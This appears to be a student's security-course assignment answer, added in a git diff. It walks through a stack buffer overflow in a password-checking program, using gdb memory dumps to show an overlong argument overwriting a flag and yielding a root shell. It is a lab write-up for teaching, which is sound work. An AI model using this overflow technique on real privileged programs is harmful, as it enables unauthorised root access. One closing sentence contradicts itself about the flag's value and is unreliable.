Assignment 2, 3

1 files changed, 50 insertions, 0 deletions

diff --git a/CamilStaps-s4498062-Assignment-3/ex2 b/CamilStaps-s4498062-Assignment-3/ex2
new file mode 100644
index 0000000..1a43891
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-3/ex2
@@ -0,0 +1,50 @@
+a
+    If there is no cli argument, the program aborts.
+    Otherwise, checkpass() is called with the argument.
+    The crypt library is used to compute a hash of the argument with some salt.
+    According to http://www.gnu.org/software/libc/manual/html_node/crypt.html,
+    the best way to recover the password is to launch a brute force attack.
+
+b
+    Before strcpy, the stack is 'normal':
+
+        ...
+        (gdb) ni
+        0x0000000000400840  14      strcpy(password,input);
+        ...
+        => 0x0000000000400840 <checkpass+42>:   e8 2b fe ff ff  call   0x400670 <strcpy@plt>
+        (gdb) x /64bx $rsp
+        0x7ffe8a0fdd60: 0x78    0x5d    0x3b    0xaf    0x29    0x7f    0x00    0x00
+        0x7ffe8a0fdd68: 0x53    0xf4    0x0f    0x8a    0xfe    0x7f    0x00    0x00
+        0x7ffe8a0fdd70: 0x00    0x00    0x00    0x00    0x01    0x00    0x00    0x00
+        0x7ffe8a0fdd78: 0x30    0x08    0x00    0x00    0x01    0x00    0x00    0x00
+        0x7ffe8a0fdd80: 0xb0    0xde    0x0f    0x8a    0xfe    0x7f    0x00    0x00
+        0x7ffe8a0fdd88: 0x38    0x4f    0xba    0xaf    0x29    0x7f    0x00    0x00
+        0x7ffe8a0fdd90: 0xe0    0xde    0x0f    0x8a    0xfe    0x7f    0x00    0x00
+        0x7ffe8a0fdd98: 0x00    0x75    0xba    0xaf    0x29    0x7f    0x00    0x00
+
+    But, because we're copying more characters than `password` can hold, after
+    strcpy, the stack is corrupted:
+
+        (gdb) ni
+        ...
+        (gdb) x /64bx $rsp
+        0x7ffe8a0fdd60: 0x78    0x5d    0x3b    0xaf    0x29    0x7f    0x00    0x00
+        0x7ffe8a0fdd68: 0x53    0xf4    0x0f    0x8a    0xfe    0x7f    0x00    0x00
+        0x7ffe8a0fdd70: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
+        0x7ffe8a0fdd78: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
+        0x7ffe8a0fdd80: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
+        0x7ffe8a0fdd88: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
+        0x7ffe8a0fdd90: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
+        0x7ffe8a0fdd98: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
+
+    In particular, the value of `correct` is now 0x41:
+
+        (gdb) x &correct
+        0x7ffe8a0fde8f: 0x41
+
+    which is truthy. 
+    The hash is computed normally, the strcmp call evaluates to non-zero, so the
+    string `ERROR: password incorrect` is printed, however, correct stays false.
+    Because of this, a root shell is started.
+